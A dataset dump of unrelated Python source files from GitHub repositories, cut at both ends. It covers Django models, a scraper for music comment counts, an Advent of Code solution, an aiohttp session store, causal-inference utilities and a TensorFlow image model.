check_file_info))\n return True\n\n\n@signal_and_lock.Signal.decorate('conf_wizard')\ndef conf_wizard_document(wizard_ident, xfer):\n if isinstance(wizard_ident, list) and (xfer is None):\n wizard_ident.append((\"document_params\", 55))\n elif (xfer is not None) and (wizard_ident == \"document_params\"):\n xfer.add_title(_(\"Lucterios documents\"), _(\"Parameters\"))\n lbl = XferCompLabelForm(\"nb_folder\")\n lbl.set_location(1, xfer.get_max_row() + 1)\n lbl.set_value(TEXT_TOTAL_NUMBER % {'name': FolderContainer._meta.verbose_name_plural, 'count': len(FolderContainer.objects.all())})\n xfer.add_component(lbl)\n lbl = XferCompLabelForm(\"nb_doc\")\n lbl.set_location(1, xfer.get_max_row() + 1)\n lbl.set_value(TEXT_TOTAL_NUMBER % {'name': DocumentContainer._meta.verbose_name_plural, 'count': len(DocumentContainer.objects.all())})\n xfer.add_component(lbl)\n btn = XferCompButton(\"btnconf\")\n btn.set_location(4, xfer.get_max_row() - 1, 1, 2)\n btn.set_action(xfer.request, FolderList.get_action(TITLE_MODIFY, \"images/edit.png\"), close=CLOSE_NO)\n xfer.add_component(btn)\n","repo_name":"Lucterios2/documents","sub_path":"lucterios/documents/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":30466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1090432623","text":"from django.db import models\nfrom multiselectfield import MultiSelectField\nfrom django import forms\n\nTYPES = (\n ('lec', 'Лекция'),\n ('prac', 'Практика'),\n ('seminar', 'Семинар'),\n ('lab', 'Лаб.')\n)\n\nLESSON_NUMBERS = (\n (\"1\", \"1-ая пара\"),\n (\"2\", \"2-ая пара\"),\n (\"3\", \"3-яя пара\"),\n (\"4\", \"4-ая пара\"),\n (\"5\", \"5-ая пара\"),\n (\"6\", \"6-ая пара\"),\n (\"7\", \"7-ая пара\"),\n)\n\n\nclass TimeBasedModels(models.Model):\n class Meta:\n abstract = True\n\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n\nclass User(TimeBasedModels):\n class Meta:\n verbose_name = \"Пользователь\"\n verbose_name_plural = \"Пользователи\"\n\n id = models.AutoField(primary_key=True)\n user_id = models.BigIntegerField(unique=True, default=1, verbose_name=\"ID пользователя Telegram\")\n name = models.CharField(max_length=100, verbose_name=\"Имя пользователя\", blank=True, null=True)\n username = models.CharField(max_length=100, verbose_name=\"Username Telegram\", blank=True, null=True)\n\n def __str__(self):\n return f\"№{self.id} {self.user_id} - {self.name}\"\n\n\nclass Subject(TimeBasedModels):\n class Meta:\n verbose_name = \"Предмет\"\n verbose_name_plural = \"Предметы\"\n\n id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=100, verbose_name=\"Название предмета\")\n\n def __str__(self):\n return f\"№{self.id} - {self.name}\"\n\n\nclass ZoomLink(TimeBasedModels):\n class Meta:\n verbose_name = \"ZOOM ссылка\"\n verbose_name_plural = \"ZOOM ссылки\"\n\n id = models.AutoField(primary_key=True)\n subject = models.ForeignKey(Subject, verbose_name=\"Предмет\", on_delete=models.CASCADE)\n type = MultiSelectField(choices=TYPES, max_choices=2, verbose_name=\"Тип пары (max_choices = 2)\")\n url = models.URLField(verbose_name=\"Ссылка (optional)\", blank=True, null=True)\n code = models.CharField(max_length=100, verbose_name=\"Код\")\n password = models.CharField(max_length=100, verbose_name=\"Пароль (optional)\", blank=True, null=True)\n\n def __str__(self):\n return f\"№{self.id} - {self.subject} ({self.type})\"\n\n\nclass Teacher(TimeBasedModels):\n class Meta:\n verbose_name = \"Перподаватель\"\n verbose_name_plural = \"Преподаватели\"\n\n id = models.AutoField(primary_key=True)\n last_name = models.CharField(max_length=100, verbose_name=\"Фамилия\")\n first_name = models.CharField(max_length=100, verbose_name=\"Имя\")\n middle_name = models.CharField(max_length=100, verbose_name=\"Отчество (optional)\", blank=True, null=True)\n subject = models.ForeignKey(Subject, verbose_name=\"Предмет\", on_delete=models.CASCADE)\n type = MultiSelectField(choices=TYPES, max_choices=2, verbose_name=\"Тип пары (max_choices = 2)\")\n email = models.EmailField(verbose_name=\"Email адрес\", blank=True, null=True)\n\n def __str__(self):\n return f\"№{self.id} - {self.first_name} {self.middle_name} ({self.subject} - {self.type})\"\n\n\nclass Weekday(TimeBasedModels):\n class Meta:\n verbose_name = \"День недели\"\n verbose_name_plural = \"Дни недели\"\n\n id = models.AutoField(primary_key=True)\n code = models.CharField(max_length=3, verbose_name=\"Код\", default=1)\n name = models.CharField(max_length=100, verbose_name=\"Название\")\n\n def __str__(self):\n return f\"№{self.id} - {self.name}\"\n\n\nclass Timetable(TimeBasedModels):\n class Meta:\n verbose_name = \"Расписание\"\n verbose_name_plural = \"Расписание\"\n unique_together = ['weekday', 'lesson_number', 'even_week', 'odd_week']\n\n id = models.AutoField(primary_key=True)\n weekday = models.ForeignKey(Weekday, verbose_name=\"День недели\", on_delete=models.CASCADE)\n lesson_number = MultiSelectField(choices=LESSON_NUMBERS, max_choices=1, verbose_name=\"Номер пары\")\n subject = models.ForeignKey(Subject, verbose_name=\"Предмет\", on_delete=models.CASCADE)\n audience_number = models.CharField(max_length=100, verbose_name=\"Номер аудитории (optional)\",\n blank=True, null=True, default=\"\")\n is_remotely = models.BooleanField(verbose_name=\"Дистанционно\", default=False)\n type = MultiSelectField(choices=TYPES, max_choices=1, verbose_name=\"Тип пары\", min_choices=0,\n default=\"\", blank=True, null=True)\n even_week = models.BooleanField(verbose_name=\"Четная неделя\")\n odd_week = models.BooleanField(verbose_name=\"Нечетная неделя\")\n\n def __str__(self):\n return f\"№{self.id} - {self.weekday} {self.subject} (Пара №{self.lesson_number})\"\n\n\nclass Homework(TimeBasedModels):\n class Meta:\n verbose_name = 'Домашнее задание'\n verbose_name_plural = 'Домашние задания'\n\n id = models.AutoField(primary_key=True)\n subject = models.ForeignKey(Subject, verbose_name=\"Предмет\", on_delete=models.CASCADE)\n date = models.DateField(verbose_name=\"Дедлайн\")\n description = models.TextField(verbose_name=\"Описание задания\")\n photo = models.ImageField(verbose_name=\"Фото\", null=True, blank=True)\n file = models.FileField(verbose_name=\"Файл\", null=True, blank=True)\n\n def __str__(self):\n return f\"№{self.id} - {self.subject} {self.description} ({self.date})\"\n","repo_name":"KStepanI1/web-leti-0372","sub_path":"server/django_project/shelp/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10334173779","text":"class WorkSearch(object):\n\tdef from_json(self, json_obj):\n\t\tself.id = json_obj[\"id\"]\n\t\tself.title = json_obj[\"title\"]\n\t\tself.summary = json_obj[\"summary\"]\n\t\tself.notes = None if json_obj[\"notes\"] == \"null\" else json_obj[\"notes\"]\n\t\tself.is_complete = self.convert_bool(json_obj[\"is_complete\"])\n\t\tself.process_status = None if json_obj[\"process_status\"] == \"null\" else json_obj[\"process_status\"]\n\t\tself.cover_url = None if json_obj[\"cover_url\"] == \"null\" else json_obj[\"cover_url\"]\n\t\tself.cover_alt_text = None if json_obj[\"cover_alt_text\"] == \"null\" else json_obj[\"cover_alt_text\"]\n\t\tself.epub_id = None if json_obj[\"epub_id\"] == \"null\" else json_obj[\"epub_id\"]\n\t\tself.zip_id = None if json_obj[\"zip_id\"] == \"null\" else json_obj[\"zip_id\"]\n\t\tself.anon_comments_permitted = self.convert_bool(json_obj[\"anon_comments_permitted\"])\n\t\tself.comments_permitted = self.convert_bool(json_obj[\"comments_permitted\"])\n\t\tself.word_count = json_obj[\"word_count\"]\n\t\tself.audio_length = json_obj[\"audio_length\"]\n\t\tself.user_id = json_obj[\"user_id\"]\n\t\tself.work_type = None if json_obj[\"work_type\"] == \"null\" else json_obj[\"work_type\"]\n\t\tself.user = json_obj[\"user\"]\n\n\tdef convert_bool(string_bool):\n\t\treturn False if string_bool == \"false\" else True\n\n\nclass SearchObject(object):\n\tdef with_term(self, term, pagination=None, mode=('all', 'all'), order_by='-updated_on'):\n\t\treturn_obj = {}\n\t\twork_search = {}\n\t\twork_search[\"term\"] = term\n\t\twork_search[\"include_mode\"] = mode[0]\n\t\twork_search[\"exclude_mode\"] = mode[1]\n\t\twork_search[\"page\"] = 1\n\t\twork_search[\"order_by\"] = order_by\n\t\twork_search[\"include_filter\"] = {'tags': [], 'attributes': []}\n\t\twork_search[\"exclude_filter\"] = {'tags': [], 'attributes': []}\n\t\treturn_obj[\"work_search\"] = work_search\n\n\t\tbookmark_search = {}\n\t\tbookmark_search[\"term\"] = term\n\t\tbookmark_search[\"page\"] = 1\n\t\tbookmark_search[\"include_mode\"] = mode[0]\n\t\tbookmark_search[\"exclude_mode\"] = mode[1]\n\t\tbookmark_search[\"order_by\"] = order_by\n\t\tbookmark_search[\"include_filter\"] = {'tags': [], 'attributes': []}\n\t\tbookmark_search[\"exclude_filter\"] = {'tags': [], 'attributes': []}\n\t\treturn_obj[\"bookmark_search\"] = bookmark_search\n\n\t\tcollection_search = {}\n\t\tcollection_search[\"term\"] = term\n\t\tcollection_search[\"include_mode\"] = mode[0]\n\t\tcollection_search[\"exclude_mode\"] = mode[1]\n\t\tcollection_search[\"page\"] = 1\n\t\tcollection_search[\"order_by\"] = order_by\n\t\tcollection_search[\"include_filter\"] = {'tags': [], 'attributes': []}\n\t\tcollection_search[\"exclude_filter\"] = {'tags': [], 'attributes': []}\n\t\treturn_obj[\"collection_search\"] = collection_search\n\n\t\tuser_search = {}\n\t\tuser_search[\"term\"] = term\n\t\tuser_search[\"page\"] = 1\n\t\tuser_search[\"filter\"] = {}\n\t\treturn_obj[\"user_search\"] = user_search\n\n\t\ttag_search = {}\n\t\ttag_search[\"term\"] = term\n\t\ttag_search[\"include_mode\"] = mode[0]\n\t\ttag_search[\"exclude_mode\"] = mode[1]\n\t\ttag_search[\"page\"] = 1\n\t\ttag_search[\"order_by\"] = order_by\n\t\ttag_search[\"include_filter\"] = {'tag_type': [], 'text': []}\n\t\ttag_search[\"exclude_filter\"] = {'tag_type': [], 'text': []}\n\t\treturn_obj[\"tag_search\"] = tag_search\n\n\t\tif pagination:\n\t\t\tobj = pagination['obj'].lower()\n\t\t\tif obj == 'work':\n\t\t\t\treturn_obj['work_search']['page'] = pagination['page']\n\t\t\telif obj == 'bookmark':\n\t\t\t\treturn_obj['bookmark_search']['page'] = pagination['page']\n\t\t\telif obj == 'tag':\n\t\t\t\treturn_obj['tag_search']['page'] = pagination['page']\n\t\t\telif obj == 'bookmarkcollection':\n\t\t\t\treturn_obj['collection_search']['page'] = pagination['page']\n\n\t\treturn return_obj\n\n\tdef get_object_type(self, filter_term):\n\t\tif 'audio' in filter_term:\n\t\t\treturn 'work'\n\t\telif 'tag_type' in filter_term:\n\t\t\treturn 'tag'\n\t\telif 'attribute_type' in filter_term:\n\t\t\treturn 'attribute'\n\t\telif 'work_type' in filter_term:\n\t\t\treturn 'work'\n\t\telif 'word_count' in filter_term:\n\t\t\treturn 'work'\n\t\telif 'complete' in filter_term:\n\t\t\treturn 'work'\n\t\telif 'rating' in filter_term:\n\t\t\treturn 'bookmark'\n","repo_name":"c-e-p/ourchive","sub_path":"ourchive_app/frontend/search_models.py","file_name":"search_models.py","file_ext":"py","file_size_in_byte":3892,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"15402765838","text":"import numpy as np\nimport math\nfrom because.probability.standardiz import standardize\nfrom sklearn import linear_model\nfrom sklearn.gaussian_process.kernels import RBF\nfrom sklearn.gaussian_process import GaussianProcessRegressor\nfrom sklearn import svm\nfrom because.probability.rcot.RCoT import RCoT\nfrom sklearn.kernel_ridge import KernelRidge\nfrom because.probability.rff.rffridge import RFFRidgeRegression\nfrom because.probability.rff.rffgpr import RFFGaussianProcessRegressor\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.neural_network import MLPRegressor\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.neighbors import KNeighborsClassifier\n\ndef balance(A, B):\n newA = []\n newB = []\n bdict = {}\n N = A.shape[0]\n bvals = set(B)\n card = len(bvals)\n if card > 2:\n return (A, B, False)\n return (A, B, True)\n for v in bvals:\n bdict[v] = 0\n for v in B:\n bdict[v] += 1\n proportions = {}\n maxProp = 0\n for v in bvals:\n prop = bdict[v] / N\n if prop > maxProp:\n maxProp = prop\n proportions[v] = bdict[v] / N\n for i in range(N):\n bv = B[i]\n av = A[i]\n for j in range(int(round(maxProp / proportions[bv], 0))):\n newA.append(av)\n newB.append(bv)\n return (np.array(newA), np.array(newB), True)\n\ndef test_direction(rvA, rvB, power=1, N_train=2000, sensitivity=None):\n \"\"\" When having power parameter less than 1,\n test the causal direction between variables A and B\n using one of the LiNGAM or GeNGAM pairwise algorithms.\n\n When having power larger than 0, use non-linear method\n to test the causal direction. N_train determines at most\n how many samples would be used to train the non-linear\n model. Currently test uses KNN algorithm.\n\n Returns a number R. A positive R indicates that the\n causal path runs from A toward B. A negative value\n indicates a causal path from B towards A. Values\n close to zero (e.g. +/- 10**-5) means that causal\n direction could not be determined.\n \"\"\"\n if power < 1:\n # If power = 0, use lingam (i.e. linear method)\n # Pairwise Lingam Algorithm (Hyperbolic Tangent (HT) variant)\n cum = 0\n s1 = rvA\n s2 = rvB\n for i in range(len(s1)):\n v1 = s1[i]\n v2 = s2[i]\n cumulant = v1 * math.tanh(v2) - v2 * math.tanh(v1)\n cum += cumulant\n avg = cum / float(len(s1))\n cc = np.corrcoef([s1, s2])\n rho = cc[1, 0]\n R = math.tanh(rho * avg * 100)\n return R\n else:\n # We found that averaging multiple small samples (e.g. 2K)\n # is far more accurate and faster than using large or full\n # samples.\n import random\n #newSeed = random.randint(1,1000000)\n #np.random.seed(newSeed)\n sampSize = N_train\n cum = 0.0\n N = len(rvA)\n samples = 3 + int(math.log(power, 10) * 20)\n if N < sampSize * 2:\n sampSize = int(N / 2)\n rvA_a = np.array(rvA)\n rvB_a = np.array(rvB)\n for i in range(samples):\n if sampSize < N:\n inds = np.random.choice(N, size=sampSize, replace=False)\n sA = rvA_a[inds]\n sB = rvB_a[inds]\n else:\n sA = rvA_a\n sB = rvB_a\n #AtoB = non_linear_direct_test(sA, sB)\n #BtoA = non_linear_direct_test(sB, sA)\n try:\n # pass\n AtoB = non_linear_direct_test(sA, sB)\n BtoA = non_linear_direct_test(sB, sA)\n except:\n continue\n if BtoA == 0 and AtoB == 0:\n continue\n #print('AtoB, BtoA = ', AtoB, BtoA)\n R0 = (BtoA - AtoB) / (BtoA + AtoB)\n Rsamp = math.tanh(R0)\n cum += Rsamp\n R = cum / samples\n #print('AtoB, BtoA, R = ', AtoB, BtoA, R, R0)\n return R\n\ndef non_linear_direct_test(A, B):\n A, B, isCat = balance(A,B)\n s1 = A.reshape(-1, 1)\n s2 = B\n\n N = s1.shape[0]\n\n #reg = RFFRidgeRegression(rff_dim=100)\n if isCat and False:\n reg = KNeighborsClassifier(n_neighbors=10)\n s2 = np.int_(s2)\n else:\n reg = KNeighborsRegressor(n_neighbors=10)\n\n reg.fit(s1, s2)\n\n preds = reg.predict(s1)\n residual = s2 - preds\n #print('N = ', N)\n #for i in range(10):\n # print('s1, s2, preds = ', s1[i], s2[i], preds[i])\n\n num_f2 = 8\n #(p, Sta) = RCoT(A, residual, num_f2=num_f2, seed = 1)\n (p, Sta) = RCoT(A, residual, num_f2=num_f2)\n return math.log(Sta / (num_f2 ** 2) + 1)\n","repo_name":"RogerDev/Because","sub_path":"because/probability/direction.py","file_name":"direction.py","file_ext":"py","file_size_in_byte":4714,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"32"} +{"seq_id":"27233622650","text":"import pandas as pd\nfrom xls_io import XLSIO\nfrom get_legislators_from_address import get_legislators_from_address\n\ndef populate_sheet_with_legislators(name, address_column_names):\n\n my_XLSIO = XLSIO(name)\n worksheet = my_XLSIO.load()\n\n # Combine columns into full address column\n worksheet['Combined address'] = ''\n for column_name in address_column_names:\n worksheet['Combined address'] = worksheet['Combined address'] \\\n + worksheet[column_name].astype(str)\n\n # Get size of sheet\n ws_size = worksheet['Combined address'].shape[0]\n\n # Define columns to build from requested info\n senators_names = [None] * ws_size\n\n # Run each address and get legislators\n for index, row in worksheet.iterrows():\n legislators = get_legislators_from_address(row['Combined address'])\n\n # Skip if no legislators found\n if legislators == None:\n continue\n\n else:\n # Print some progress\n if index % 5 == 0:\n print(\"Done with %i rows\" % index)\n\n # Extract senator names\n senators_names[index] = list(\n filter(lambda legislator: legislator['chamber'] == 'upper',\n legislators))[0]['full_name']\n\n # Set extracted lists to new columns\n worksheet['Senator name'] = senators_names\n\n my_XLSIO.save()\n\nif __name__ == \"__main__\":\n populate_sheet_with_legislators(\n name = '../files/renter_deduction_bill',\n address_column_names = ['Street address', 'City'])\n\n # populate_sheet_with_legislators(\n # name = '../files/non_member',\n # address_column_names = ['Street Address', 'Town', 'Zip'])\n","repo_name":"hdavidzhu/mahc","sub_path":"utilities/populate_sheet_with_legislators.py","file_name":"populate_sheet_with_legislators.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4340794420","text":"import matplotlib.pyplot as plt\n\n\ndef show_sines(data, targets, skip):\n\n fig, axes = plt.subplots(1, 4, figsize=(9, 3))\n plt.subplots_adjust(0.05, 0.1, 0.95, 0.9, 0.3, 0.1)\n\n for ax, x, y in zip(axes, data, targets):\n ax.plot(x)\n ax.scatter(len(x) + skip, y)\n ax.set_ylim(-2.1, 2.1)\n\n fig.show()\n","repo_name":"vikiival/neural_networks_at_fiit","sub_path":"week_8/backstage/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24455699822","text":"#!/usr/bin/env python3\n\nimport re\nfrom collections import namedtuple\nfrom os.path import dirname\nfrom typing import FrozenSet, List, Set\n\nfrom aocd import get_data\n\nDAY = int(re.sub(r'[^0-9]', \"\", dirname(__file__).split('/')[-1]))\nYEAR = int(re.sub(r'[^0-9]', \"\", dirname(__file__).split('/')[-2]))\nDATA: str = get_data(day=DAY, year=YEAR)\n\n# DATA = \"2,2,2\\n1,2,2\\n3,2,2\\n2,1,2\\n2,3,2\\n2,2,1\\n2,2,3\\n2,2,4\\n2,2,6\\n1,2,5\\n3,2,5\\n2,1,5\\n2,3,5\"\n\nlines = DATA.splitlines()\n\nCube = namedtuple(\"Cube\", \"x y z\")\n\ncubes: FrozenSet[Cube] = frozenset([Cube(*map(int, l.split(\",\"))) for l in lines])\n\n\ndef sides(c: Cube) -> FrozenSet[Cube]:\n return frozenset(\n [\n Cube(c.x + 1, c.y, c.z),\n Cube(c.x - 1, c.y, c.z),\n Cube(c.x, c.y + 1, c.z),\n Cube(c.x, c.y - 1, c.z),\n Cube(c.x, c.y, c.z + 1),\n Cube(c.x, c.y, c.z - 1),\n ]\n )\n\n\ndef count_neighbors(cubes: FrozenSet[Cube], c: Cube) -> int:\n return sum(1 for n in sides(c) if n in cubes)\n\n\nprint(f\"part 1:\\t{sum(6 - count_neighbors(cubes, c) for c in cubes)}\")\n\nseen: Set[Cube] = set()\nq: List[Cube] = [Cube(-1, -1, -1)]\n\nwhile q:\n cur = q.pop()\n q += [s for s in (sides(cur) - cubes - seen) if all(-1 <= c <= 25 for c in s)]\n seen |= {cur}\n\nprint(f\"part 2:\\t{sum((s in seen) for c in cubes for s in sides(c))}\")\n","repo_name":"Alexdelia/puzzle","sub_path":"Advent_of_Code/y2022/d18/p.py","file_name":"p.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"888289704","text":"import turtle\nimport math\ndef MG(n,l):\n turtle.left(90 + 180/n)\n for i in range(n):\n turtle.forward(l)\n turtle.left(360/n)\n\ndef rad (n, a):\n r = a / (2 * math.sin(2*math.pi / (2 * n)))\n return r\n\nl = 40\nfor i in range(1, 10, 1):\n MG((i+2), l + 5*i)\n turtle.right(180 / (i+2) + 90)\n turtle.penup()\n turtle.forward(rad(i+3, l + 5*(i+1)) - rad(i+2, l + 5*i))\n turtle.pendown()","repo_name":"Hoodyman1/infa_2021_Shcherbakov","sub_path":"lab1/t9.py","file_name":"t9.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29528708950","text":"import json\nimport uuid\nfrom typing import Any, Callable, Optional\n\nimport psycopg2.extras\nfrom aiohttp import web\nfrom aiopg import Pool\n\nfrom aiohttp_session import AbstractStorage, Session\n\n\nclass PgStorage(AbstractStorage):\n \"\"\"PG storage\"\"\"\n\n def __init__( # type: ignore[no-any-unimported]\n self,\n pg_pool: Pool,\n *,\n cookie_name: str = \"AIOHTTP_SESSION\",\n domain: Optional[str] = None,\n max_age: Optional[int] = None,\n path: str = \"/\",\n secure: Optional[bool] = None,\n httponly: bool = True,\n key_factory: Callable[[], str] = lambda: uuid.uuid4().hex,\n encoder: Callable[[object], str] = psycopg2.extras.Json,\n decoder: Callable[[str], Any] = json.loads,\n ):\n super().__init__(\n cookie_name=cookie_name,\n domain=domain,\n max_age=max_age,\n path=path,\n secure=secure,\n httponly=httponly,\n encoder=encoder,\n decoder=decoder,\n )\n self._pg = pg_pool\n self._key_factory = key_factory\n\n async def load_session(self, request: web.Request) -> Session:\n cookie = self.load_cookie(request)\n if cookie is None:\n return Session(None, data={}, new=True, max_age=self.max_age)\n else:\n async with self._pg.acquire() as conn:\n key = uuid.UUID(cookie)\n async with conn.cursor(\n cursor_factory=psycopg2.extras.DictCursor\n ) as cur:\n\n await cur.execute(\n \"SELECT session, extract(epoch from created) \"\n + \"FROM web.sessions WHERE uuid = %s\",\n (key,),\n )\n data = await cur.fetchone()\n\n if not data:\n return Session(None, data={}, new=True, max_age=self.max_age)\n\n return Session(key, data=data, new=False, max_age=self.max_age)\n\n async def save_session(\n self, request: web.Request, response: web.StreamResponse, session: Session\n ) -> None:\n key = session.identity\n if key is None:\n key = self._key_factory()\n self.save_cookie(response, key, max_age=session.max_age)\n else:\n if session.empty:\n self.save_cookie(response, \"\", max_age=session.max_age)\n else:\n key = str(key)\n self.save_cookie(response, key, max_age=session.max_age)\n\n data = self._get_session_data(session)\n if not data:\n return\n\n data_encoded = self._encoder(data[\"session\"])\n expire = data[\"created\"] + (session.max_age or 0)\n async with self._pg.acquire() as conn:\n async with conn.cursor() as cur:\n await cur.execute(\n \"INSERT INTO web.sessions (uuid,session,created,expire)\"\n + \" VALUES (%s, %s, to_timestamp(%s),to_timestamp(%s))\"\n + \" ON CONFLICT (uuid)\"\n + \" DO UPDATE\"\n + \" SET (session,expire)=(EXCLUDED.session, EXCLUDED.expire)\",\n [key, data_encoded, data[\"created\"], expire],\n )\n","repo_name":"aio-libs/aiohttp-session","sub_path":"examples/postgres_storage.py","file_name":"postgres_storage.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":234,"dataset":"github-code","pt":"32"} +{"seq_id":"13053303786","text":"import scrapy\nfrom lxml import etree\nfrom ActualCombat.scrapy_wyy.scrapy_wyy.items import ScrapyWyyItem\nimport copy\nfrom ActualCombat.scrapy_wyy.Test.test_open import get_music\n\nclass WyyBotSpider(scrapy.Spider):\n name = 'wyy_bot'\n\n # 这里填写歌单的url\n def start_requests(self):\n all_music_name, all_musi_id = get_music()\n for index,value in enumerate(all_musi_id):\n url = 'http://music.163.com/api/v1/resource/comments/R_SO_4_'+all_musi_id[index]\n r = scrapy.Request(url=url)\n r.meta['song_name'] = all_music_name[index]\n r.meta['song_id'] = all_musi_id[index]\n yield r\n\n def parse(self, response):\n # 创建一个item对象\n item = ScrapyWyyItem()\n # 歌曲id\n item['song_id'] = response.meta['song_id']\n # 歌曲名\n item['song_name'] = response.meta['song_name']\n # 数据处理\n response = response.text.split(',')\n test_toatl_comment = copy.deepcopy(response)\n for i in test_toatl_comment:\n if 'total' not in i:\n response.remove(i)\n # 歌曲总评论数\n item['total_comment'] = response[0].split(':')[1]\n yield item\n\n # def parse(self, response):\n # # 创建etree\n # song_etree = etree.HTML(response.text)\n # # 获取所有歌\n # all_song_name = song_etree.xpath('//div[@id=\"song-list-pre-cache\"]/ul/li/a/text()')\n # # 获取所以歌的id\n # all_song_id = song_etree.xpath('//textarea[@id=\"song-list-pre-data\"]/text()')\n # # 创建一个item对象\n # item = ScrapyWyyItem()\n # # 进行数据初选\n # all_song_id = all_song_id[0].split(',')\n # # 进行深拷贝\n # test_all_song = copy.deepcopy(all_song_id)\n # # 进行数据筛选\n # for i in test_all_song:\n # if 'R_SO' not in i:\n # all_song_id.remove(i)\n # # 对该歌单每首歌对信息进行筛选\n # for index, value in enumerate(all_song_id):\n # # 数据处理\n # song_id = value.split('\":\"')[1][:-1]\n # # 歌曲id\n # item['song_id'] = song_id\n # # 歌曲名字\n # item['song_name'] = all_song_name[index]\n # # 对应url\n # url = 'http://music.163.com/api/v1/resource/comments/'+song_id\n # yield scrapy.Request(url=url, meta=item, callback=self.parse_comment)\n\n # def parse_comment(self, response):\n # # 创建一个item对象\n # item = ScrapyWyyItem()\n # # 歌曲id\n # item['song_id'] = response.meta['song_id']\n # # 歌曲名\n # item['song_name'] = response.meta['song_name']\n # # 数据处理\n # response = response.text.split(',')\n # test_toatl_comment = copy.deepcopy(response)\n # for i in test_toatl_comment:\n # if 'total' not in i:\n # response.remove(i)\n # # 歌曲总评论数\n # item['total_comment'] = response[0].split(':')[1]\n # yield item\n #\n","repo_name":"isgaokai/PythonBot","sub_path":"ActualCombat/scrapy_wyy/scrapy_wyy/spiders/wyy_bot.py","file_name":"wyy_bot.py","file_ext":"py","file_size_in_byte":3091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8615427779","text":"import tensorflow as tf\nfrom functools import reduce\nfrom operator import mul\n\n\nclass MultiModal(object):\n def __init__(self):\n self.image = tf.placeholder(tf.float32, [None, 88, 88, 3], name='image')\n self.visit = tf.placeholder(tf.float32, [None, 7, 26, 24], name='visit')\n\n with tf.name_scope(\"label\"):\n self.label = tf.placeholder(tf.int32, [None], name='label')\n self.one_hot = tf.one_hot(indices=self.label, depth=9, name='one_hot')\n\n self.global_step = tf.Variable(0, name=\"global_step\", trainable=False)\n self.training = tf.placeholder(tf.bool)\n\n self.output_image = self.image_network(self.image)\n print(self.output_image)\n self.output_visit = self.visit_network(self.visit)\n print(self.output_visit)\n self.output = tf.concat([self.output_image, self.output_visit], axis=1)\n self.prediction = tf.layers.dense(self.output, units=9)\n\n self.loss = self.get_loss(self.prediction, self.one_hot)\n\n self.batch_size = 512\n with tf.name_scope('correct_prediction'):\n correct_prediction = tf.equal(tf.argmax(self.prediction, 1), tf.argmax(self.one_hot, 1))\n with tf.name_scope('accuracy'):\n self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n tf.summary.scalar('train_accuracy_concat', self.accuracy)\n\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n self.optimizer = tf.train.AdamOptimizer(1e-3).minimize(self.loss, global_step=self.global_step)\n\n self.merged = tf.summary.merge_all()\n print(\"网络初始化成功\")\n\n def conv2d(self, x, input_filters, output_filters, kernel, strides=1, padding=\"SAME\"):\n with tf.name_scope('conv'):\n shape = [kernel, kernel, input_filters, output_filters]\n weight = tf.Variable(tf.truncated_normal(shape, stddev=0.1), name='weight')\n return tf.nn.conv2d(x, weight, strides=[1, strides, strides, 1], padding=padding, name='conv')\n\n def residual(self, x, num_filters, strides, with_shortcut=False):\n with tf.name_scope('residual'):\n conv1 = self.conv2d(x, num_filters[0], num_filters[1], kernel=1, strides=strides)\n bn1 = tf.layers.batch_normalization(conv1, axis=3, training=self.training)\n relu1 = tf.nn.relu(bn1)\n conv2 = self.conv2d(relu1, num_filters[1], num_filters[2], kernel=3)\n bn2 = tf.layers.batch_normalization(conv2, axis=3, training=self.training)\n relu2 = tf.nn.relu(bn2)\n conv3 = self.conv2d(relu2, num_filters[2], num_filters[3], kernel=1)\n bn3 = tf.layers.batch_normalization(conv3, axis=3, training=self.training)\n if with_shortcut:\n shortcut = self.conv2d(x, num_filters[0], num_filters[3], kernel=1, strides=strides)\n bn_shortcut = tf.layers.batch_normalization(shortcut, axis=3, training=self.training)\n residual = tf.nn.relu(bn_shortcut+bn3)\n else:\n residual = tf.nn.relu(x+bn3)\n return residual\n\n def image_network(self, image):\n channel = 16\n with tf.name_scope(\"Resnet-image\"):\n with tf.name_scope('stage1'):\n conv = self.conv2d(image, 3, channel, 7, 1)\n bn = tf.layers.batch_normalization(conv, axis=3, training=self.training)\n relu = tf.nn.relu(bn)\n with tf.name_scope('stage2'):\n pool = tf.nn.max_pool(relu, [1, 3, 3, 1], [1, 2, 2, 1], padding=\"SAME\")\n res = self.residual(pool, [channel, channel//2, channel//2, channel*2], 1, with_shortcut=True)\n with tf.name_scope('stage3'):\n res = self.residual(res, [channel*2, channel, channel, channel*4], 2, with_shortcut=True)\n with tf.name_scope('stage4'):\n res = self.residual(res, [channel*4, channel*2, channel*2, channel*8], 2, with_shortcut=True)\n with tf.name_scope('stage5'):\n res = self.residual(res, [channel*8, channel*4, channel*4, channel*16], 2, with_shortcut=True)\n pool = tf.nn.avg_pool(res, [1, 6, 6, 1], strides=[1, 1, 1, 1], padding='VALID')\n with tf.name_scope('fc'):\n flatten = tf.layers.flatten(pool)\n return flatten\n\n def visit_network(self, image):\n channel 